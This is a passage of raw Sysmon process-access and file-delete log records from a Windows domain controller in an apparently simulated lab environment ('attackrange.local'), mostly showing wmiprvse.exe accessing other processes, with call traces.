4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.717{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.638{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 